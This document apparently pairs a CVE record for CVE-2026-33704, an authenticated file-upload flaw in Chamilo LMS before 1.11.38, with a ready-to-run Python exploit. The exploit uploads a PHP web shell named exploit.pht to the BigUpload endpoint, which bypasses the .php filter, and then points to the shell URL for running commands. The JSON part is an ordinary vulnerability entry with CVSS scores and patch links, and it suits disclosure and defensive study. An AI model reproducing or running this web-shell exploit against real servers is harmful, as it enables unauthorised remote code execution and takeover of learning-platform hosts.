CVE-2026-33704

import requests def exploit(target_url, session_cookie): # The vulnerable endpoint upload_url = f"{target_url}/main/inc/lib/javascript/bigupload/inc/bigUpload.php" # PHP code to execute (e.g., a simple webshell) # 'system' function executes the 'cmd' parameter payload = "<?php if(isset($_GET['cmd'])) { system($_GET['cmd']); } ?>" # Prepare the data # 'key' parameter is used as the filename # Using .pht bypasses the .php filter files = { 'key': (None, 'exploit.pht'), 'file': (None, payload) } # Send the POST request with the authenticated session headers = { 'Cookie': f"PHPSESSID={session_cookie}" } response = requests.post(upload_url, files=files, headers=headers) if response.status_code == 200: print("[+] File uploaded successfully.") print(f"[+] Access your shell at: {target_url}/main/upload/exploit.pht?cmd=whoami") else: print("[-] Upload failed.") # Example usage # exploit("http://localhost", "valid_session_id")

{"cve": {"id": "CVE-2026-33704", "sourceIdentifier": "[email protected]", "published": "2026-04-10T19:16:23.480", "lastModified": "2026-04-16T18:34:15.600", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Chamilo LMS is a learning management system. Prior to 1.11.38, any authenticated user (including students) can write arbitrary content to files on the server via the BigUpload endpoint. The key parameter controls the filename and the raw POST body becomes the file content. While .php extensions are filtered to .phps, the .pht extension passes through unmodified. On Apache configurations where .pht is handled as PHP, this leads to Remote Code Execution. This vulnerability is fixed in 1.11.38."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 4.2}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-434"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:chamilo:chamilo_lms:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.11.38", "matchCriteriaId": "A4D0C5D2-6FA0-4532-8E3D-4EA111A50621"}]}]}], "references": [{"url": "https://github.com/chamilo/chamilo-lms/commit/9748f1ffbdb8b6dc84c0e0591c9d3c1d92e21c00", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-phfx-pwwg-945v", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}